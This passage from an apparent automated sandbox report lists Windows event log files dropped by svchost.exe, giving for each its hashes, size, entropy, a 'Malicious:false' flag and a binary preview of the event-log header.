                                      SHA-512:126938ACBBD712C5AB13F6CB97059F263F012359AF138AA8A479BE963C86D7198606B8FBDC12C14FE4BF96FBF9C7553CDA42E3AC85A8EFBC1405E8E9B08ACEF1
                                      Malicious:false
                                      Preview:ElfChnk.........Y...............Y.....................d.....................................................................Sg&.................2...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...."......................U$..................................-G..........U+..................................uZ......]...**..`.............x..,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9829684085040848
                                      Encrypted:false
                                      SSDEEP:384:Jhgo69uLpogoriorhorkkorhor3uaor5orhorIor6orlg9orUoryorEorGoreorR:JuuLrue
                                      MD5:A581AE4D2F6CE3E24531C3909FBAF235
                                      SHA1:08706919EDAECD9DAA7E9F4E91FE4DB59241E6B3
                                      SHA-256:BAF2FDDB20874C5FC87CA422C7D9052445BD26EBD193FF31F0197F0EECB07FAE
                                      SHA-512:51E4D1138AC810E3EF8458DD54119B7DDCCECBDA94189560C289E3294670E9ED458BAF6DD1EA8DCAA54318B847E6B1846B49703337E7435A037FC5CC7C954F6F
                                      Malicious:false
                                      Preview:ElfChnk......................................*...,...UZ9....................................................................e[.0................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F....................(..................................................................................................................&...........**.................I.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.8424940844900799
                                      Encrypted:false
                                      SSDEEP:384:Th+PJJ2HeJJYXJJ+EbJJ+JfJJ+8OJJ+EkJJ+YCJJ+vyJJ+oMJJ+w2JJ+GSJJ+l9G:TO8SsLmse4b+cmx/jzSKik
                                      MD5:973D7481316BF399D6F564DFF9CB148B
                                      SHA1:C4C0F0911A7C38CD3B8510B6052574FEF617B688
                                      SHA-256:C15FCF537F8E13EDDC184ADF0BA6677823748D26C24CA050E469D6C3993057AB
                                      SHA-512:3B05CD861D58C5D89404148A214FC63D7EAC536234707C71188EA92993C45BB81B47D9201AC3A22171ACBB17AAA82B2F9D1BAA9039431B2895C817B77C9DDD79
                                      Malicious:false
                                      Preview:ElfChnk......................................%...'...[.c......................................................................MR................F...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..p..............O.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.8737542209880207
                                      Encrypted:false
                                      SSDEEP:768:shRqTJlGCiKPLdKvdq6MoOwXyIur9HcyWzlmdv95fCBb:
                                      MD5:2A3BF0166E0AD02FC2C8BD850CBDA5E7
                                      SHA1:5C191B4C488D18F0122E61824E68A6E52136C4E7
                                      SHA-256:1158F3900FF95049AC7156BE48E86ACFA51B1052D56A23CE3D1C54ABBC96541F
                                      SHA-512:3087807B1937C53988A6462B126B2F6F35EF0980A62CD04EDFC83024C7632B57B0A7F68696EB5B3418C8F131DB8B0490A1796871780980971A78074F5326255C
                                      Malicious:false
                                      Preview:ElfChnk.........:...............:..................]..e.................................................................... ..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F.......................................uW..............................................................3...............................&...........**................oP.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.5717152503994258
                                      Encrypted:false
                                      SSDEEP:384:Ohykd3kN5AyrkFAP1gLkVJkzfkV6VkVz7kVmnkYz3SSkVfcMkVVkVnkVZkVdkVRd:Ota5ArAP1UH
                                      MD5:1961D6C58ACCDB14BE207AAB9A61223A
                                      SHA1:C8A6DF07D1358B4284167FC9F17E4A8C971A7344
                                      SHA-256:7010DDB5FF0F3F4E9B2F89C38D6DA6F82A7DC84AD9F6DF7AEE3C77C83746715C
                                      SHA-512:CE5E576ABDFF64CA109CDE1948B7FFE246142702EEFC357C3A3560F703BD43716B11886BFA56F8B184D4A165CC3635ED7E04C3FCFDABA20FCE77E94AB3105FA4
                                      Malicious:false
                                      Preview:ElfChnk.....................................xL..xO..Q.......................................................................m.}s................b...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&............................H..........................................;....-..............................................**..p............-...,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.4371618117198395
                                      Encrypted:false
                                      SSDEEP:384:QhFEbEmE/EfKyEUD+EpeIVfEsEjcEbEwwEyDPEyE17jEyE3EzEJEvEpEcEVESEz6:Q4Kpj7rFYtdcyNf
                                      MD5:B947B59B87FF3E2B10D911E6C68548C0
                                      SHA1:5092D48DF99589701A927E148BC22F6412089B1C
                                      SHA-256:B44EA33E9ADD1F15EE4BF60DA30408313B7CD6A46C4ED60EA2705B502BE91EDD
                                      SHA-512:8074DD3670CE05B2DDB4E7B72506A6CDA26BC3A3A3BFF8018D70FF0BF5A92CB52CC65186D6E01FCC8BB3844318304B9863B03949A09A2B6201D9B6CDC6E95489
                                      Malicious:false
                                      Preview:ElfChnk.o...............o......................8.....00....................................................................\.j.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................7..&...........E...........=)...B..........e ...2...............5..............5...............]............#..E...............**......o.........&.3............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.1345755939111095
                                      Encrypted:false
                                      SSDEEP:384:MhsVKnJKfEK4yKr5KiJKKMK8SvKQkKYIKiTKu0K+0LK8GHKRvGdKPxKtsK9PK8QD:MTA/oq
                                      MD5:41E34163E0E10F5DAEC5A201EC2E4D17
                                      SHA1:FC39979B1232659F265B75B2A0A2F6193940112B
                                      SHA-256:BBE4682E1B07F103E30DBB052D64A6D4A1B0479D17C610348EEE71B9B687D945
                                      SHA-512:73C45EA9128DA824630035E6D89A76E8A4A5C3E94B6A23BBFDE049EE7AE78CCF4299E2D991F9E9926A9BF7F17445F6FC57E87F35721DA9102C631113311C9FBC
                                      Malicious:false
                                      Preview:ElfChnk.........h...............h...........0.......V.......................................................................\tV................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F.......................&.........................................../...........................................!...................................**................4..,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):65536
                                      Entropy (8bit):2.958177935694758
                                      Encrypted:false
                                      SSDEEP:384:ahwDx7DID3DED6DYD3DAD5D9DbDBDUDYJDTD/YDMmDQD+DxDyD1DvDVDnD6DOD1t:aKe9adaNVlxACNqhu
                                      MD5:1E80B76BF69A548AEB5B296B76B01958
                                      SHA1:AC36769DDE81848958A5B74C2B468E018E8ADEAD
                                      SHA-256:F2F30C17F97BA333384311B6702EF2981C2683729907D6C4A6019BB9F79A0A69
                                      SHA-512:87AAB27EEEF7D22D1C43E80F6805C907EC6181D38A4DBB845A7D86CFD36A068FC880846FD9FDFAB35D398E17BD66C7243EF10ECA762F419F828B8526012DCAF5
                                      Malicious:false
                                      Preview:ElfChnk.....................................P......P..........................................................................}................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..............>Ec5%d............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.617502226921107
                                      Encrypted:false
                                      SSDEEP:768:/8gmL5LRjZ7pDtDI9RzdAr6nQfVERcokJCDdsp+mcIlN+aR3GmvtVt:0rr6nQfVERcokJCGp+mcIlN+aht
                                      MD5:FD1FB415F70B852BC3F9CFA4AF1B40EF
                                      SHA1:F7D95C088B90DA03AE0FB0A61502FDAA59A8A04C
                                      SHA-256:523515C1F39CB591570FB2E87CBA9B588A5866D29CC19A2BB44E66746165B917
                                      SHA-512:6180E2642782BB7E457E350915E5B6A6E3559DF65F9C55BF960488714FF60CDABFCD2BBBC8D7399A8B8A1E84DF65EFDF2C25D82F4B9D2DC07F57D58613054B99
                                      Malicious:false
                                      Preview:ElfChnk............................................._..^......................................................................W................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..@...........JSd..a............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.253348316701869
                                      Encrypted:false
                                      SSDEEP:384:gyhQTzIjzkzq7z+zlz5zwz0zlz5zZzqjzyzgzozwz2zzzbzcPzAz0zazJzBzEzdm:gyuIVm
                                      MD5:E9DB9F2819254147C2ECC14E610BF6CF
                                      SHA1:3A946152BD9BF169D18CE99015BBF3C4663B749B
                                      SHA-256:71CEA6D3BABF8912891D9D951CF104189871090D973AB08027E3096A8770CF95
                                      SHA-512:35D6E15EB9C71320373801C9CDAE63D41517DC9E87F81284A0E19B95BCE702301F8F0F733BDCF3FE5F345143D7679C81955E9E20B2588E81572F3B4FE33DDFEB
                                      Malicious:false
                                      Preview:ElfChnk.........<...............<...........@x...z....W.....................................................................x..................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F.......................n.......................................#...........E...........................................................&...........**................<H.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1095919913553913
                                      Encrypted:false
                                      SSDEEP:192:eV7/IMiOucwRhzI8BnuIA1/IQH5iFI5USHIvhZIRc:eh/IMrucwHI5I8IbFIxHIHI
                                      MD5:EEAD0728BEAE7300C65E7D4B2265B3E0
                                      SHA1:12CB818B08A1921D2ED2F7D9358AD81B8FACB7C8
                                      SHA-256:52FCEE6AEE2367D30BAC08C66333B5B90DAD6F10146320478351275E4414FE14
                                      SHA-512:42284B6B5BD4790942A5CFEE5072EA6A4D16F3C788D9315604E592567037E64CE66A2BE707DC668AC4BD828B9C0EAECC2BFDED1A8FC4E30BA2DB085AB040DA11
                                      Malicious:false
                                      Preview:ElfChnk......................................t.. ....>&k.....................................................................^..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..0.............n.{............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.909639595663036
                                      Encrypted:false
                                      SSDEEP:768:PxS2D8E2EBnbYz+dTXIyXz9TPgOeeemtCPwUfLwIriZYS4k7Ze3Np1PNSJatBXtd:3AYy
                                      MD5:EF33CAF3AF2C995DACFFC0D3AAFE739F
                                      SHA1:52A9B9DFFEDF887C4B9A5F4E0D3AF21018D15B83
                                      SHA-256:CBF3A148D6DCCC2E57AE74F7E9A53E1EDAFBB16231D9CF315CD78EDC3971ED7F
                                      SHA-512:6230801F7CAFE09E78B2C834A7D734F34556CE5D86C54EBFE560B270DAF7EEF851448F457475BDEAF4C7A56CFD1834861B53B1154FC23337CFF08C442F382972
                                      Malicious:false
                                      Preview:ElfChnk........._..............._...............(...W.T......................................................................{.b................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............-..P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.765038462904302
                                      Encrypted:false
                                      SSDEEP:384:VhCa54L2KyzVzyzIzCa5ezkzuzNz0zxzuewKWMKjIa5aUota5wqhIzIzyzla5o6U:VpUmxKmD
                                      MD5:0AA9079265476C9187A1A0C5384EA25F
                                      SHA1:5F864049090B87CECE5CC41554527E62B7595164
                                      SHA-256:DA952A1290D236A81C049EC5AD4ADE84A992E3987933099B2CC4105CAC3FC4BF
                                      SHA-512:98254A068C93F6C86619582D18754CFE920DD1261DE1855A6EF34D4E7ACC76227DF46EEEB6F9CD2ECFC0323E72C54B7D5A90AD032CFCF67A0049ABBB80A32B8A
                                      Malicious:false
                                      Preview:ElfChnk.I.......].......I.......]..............X......5......................................................................Zk........................................F...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................!....................................................%..............................**......I.........]...............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.3095584055973708
                                      Encrypted:false
                                      SSDEEP:48:MYpWVN0rP+AQNRBEZWTENO4bnBqzoZKJzwzrtJiVLW6h2yzwzrzutzwzr:kNRNVaO8ooZKJMLALWPyMzutM
                                      MD5:0230823758ECF0A6164A39DA57264393
                                      SHA1:E11776E7093A231DF30D285590861834CB4679B5
                                      SHA-256:5258C7EBAE2882B53ABD293E9621D3CEB3723E0A42054554B97DC871D1AC4AA9
                                      SHA-512:0F9524A825C6621DB552FFA22F7E394A81586921E31579465544813325E4D855CE3CE3429D1D1E27D408413450CB63F693F62A1F25ED718A56739D65AC02ED11
                                      Malicious:false
                                      Preview:ElfChnk.....................................p..................................................................................I........................................>...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**................e=.,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0818493338254933
                                      Encrypted:false
                                      SSDEEP:384:Qh/1oh1912d1U1c1Y1j1V111ad1D1Z1d1Gk1N1T171e1C1b1pv1:Q4CiC
                                      MD5:34093A5125A164E779EFDF8C6DA1CC97
                                      SHA1:ACFA485A1016B642CDF495B6FDD5DC6B644A86B7
                                      SHA-256:90263C4AFA642D516C2D41EF78A1590AC9611E4126CB98C72D68AE9A521F04E2
                                      SHA-512:13261C98D34FCFF1DE59BE840584DFE89CDA4B4B4931C093967E9C46ADC4425C5AE261B7B9FEFE5F06C795E77496E3BA9C5ED3E46F5DD94DD282970858043DF0
                                      Malicious:false
                                      Preview:ElfChnk....................................../..@1..xJ......................................................................Q..N................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......y...................................................................................................................**...................,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.3245549932510525
                                      Encrypted:false
                                      SSDEEP:384:phHIbI0IHIjSIiI7IH7IKINIOIoIQIaIZIXII1IvIJI8IKIeIuIQIAINI5uIRIjv:paO6qJ9
                                      MD5:74621CE31109FD8EF21AE238AD5CA41B
                                      SHA1:E88731FAE414EEC2A8C5DC4F9F2DAC493E0D87F7
                                      SHA-256:9DE2458A9F451C445C6875A3D402BBA44A78733F58589A7F4CB348D005A070D7
                                      SHA-512:A7EDCF4C8D13A3F43FC8CDF4DA633B58AB56C9027E19482BF9503C7B6AA784A6CF7C85348A5A3414CB1AC821CE4AE82D7F5F5A69F147BA27A012E49D5E60C7FD
                                      Malicious:false
                                      Preview:ElfChnk.........R...............R...................4..8......................................................................&"........................................>...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..h...........@.}I.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.7673344634980999
                                      Encrypted:false
                                      SSDEEP:384:ShXIWdIxInIrvGIMImIAIQI0cIcIeIxIEIOI8I/IErIfIzI:SnmvX
                                      MD5:4CF4D6AF8864B7E5706987A3E36D8219
                                      SHA1:A1332F1CFF5AFF35F96E07FA3524CC7E2A3FA1BD
                                      SHA-256:3B97A27803B3CE901584AF79403FA799E657E44E2DC4CD5878F7FD446C294ED0
                                      SHA-512:82EF2CAB5F9C869D0FCFFC36976FBCCAE8BC36DC866D5C1B02EB4B5AD147C91D7D01BAEEE122EB1135177A0385C0960D50E82F53C03257271FC35D92E956BE86
                                      Malicious:false
                                      Preview:ElfChnk......................................!...".." _J...................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............8.ZI.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.716122025324903
                                      Encrypted:false
                                      SSDEEP:768:cZ1RvmXdd6oaxmE1+oaxk1DHoaxIpT1ooaxJ1woaxU12oax61joax21Ioax718oo:exMp
                                      MD5:2F3308083029D079CD5BE99E725E9DDC
                                      SHA1:C3E45B0FA0C9E979A72AF9ECE79896A5AC409559
                                      SHA-256:4E42A9FE5331F656BCC66A80B157835D9CEE2B14BD514F3F97CF7B881F17B877
                                      SHA-512:65578E059255A28411E335509AFF44C468E8003CD63A25A3890FCF16DEC5D2033CC16971B35F9B9C3D073058DFEA9B0EC0AA37651F0E91E133C398690A19A72B
                                      Malicious:false
                                      Preview:ElfChnk..................................... .........q.........................................................................................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F.......................^...............................................................................................................&...........**..8.............xI.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4552
                                      Entropy (8bit):3.8872614439833386
                                      Encrypted:false
                                      SSDEEP:96:DQyeYHyeLyDdyFYOkycsyggJylYr5y2k+zyE:DQyeYHyeLyDdyFYOkycsyggJylYr5y2D
                                      MD5:7FED74EB9A91882B91EB58F01040612C
                                      SHA1:13216BC1D75A8F7C99F1AA01C6688A2E771991D1
                                      SHA-256:8DB19309FAD14D7C0FC14B224AF89BB334F175B22C596FBDE08858BA5A334E17
                                      SHA-512:AE8F4B9666669EDA9C403C016F2305CBF79C393E633F9775B35DD996A742AF9F3A6CB675B108C5CEBDDBA391B1F8304D33CDEE8105991CCEB00CE80C44941049
                                      Malicious:false
                                      Preview:ElfChnk.].......g.......].......g...............(...........................................................................6.Y.................>...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..x...e........................&...............................................................8.......P.....!........................w.3.....54........P...e........................I..~.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L...............x...**......f........................&...............................................................8.......P...C.
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):69280
                                      Entropy (8bit):3.083548393710768
                                      Encrypted:false
                                      SSDEEP:384:tKpK2KVKEKiKhKzhaKpwKRKtrKwKiKvuKv6KeAKpgKzkK8KDK1KIK6KcKHKkFKWM:FXj20a+RL53wp3T
                                      MD5:A69DBEA8C5639FFCFAF9132BC3509507
                                      SHA1:C5C571BCA23772EF39ED74CEAFEDF5F5C9B69488
                                      SHA-256:B12E0B5A1D6D6F1155B3A58CE953258EC5C9DD3808C30E23630116F9987FC8D6
                                      SHA-512:0BBAB38D54774A74640469195DF0D3F4724849ABC3A10D3249CAAECE3310180C3C8987FF00D20F1694F4697275E0125D24512F62974A30B5B9CFC7D6660DB889
                                      Malicious:false
                                      Preview:ElfChnk.G...............G..........................g.|2.....................................................................i..................|...........................=...........................................................................................................................f...............?...........................m...................M...F.......................' ...................W.......................c../....................................................[......................**..0...........VK................&...............................................................X.......n.....!.................VK......w.3.....m4........<............................I..~.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.u.s.h.N.o.t.i.f.i.c.a.t.i.o.n.s.-.P.l.a.t.f.o.r.m.....D@F.q..RyCM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.u.s.h.N.o.t.i.f.i.c.a.t.i.o.n.-.P.l.a.t.f.o.r.m./.O.p.e.r.a.t.i.o.n.a.l......;.W..........V...........*...W.i.n.d.o.w.s...S.y.s.t.e.m.T.o.a.s.t...S
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.1855024990303105
                                      Encrypted:false
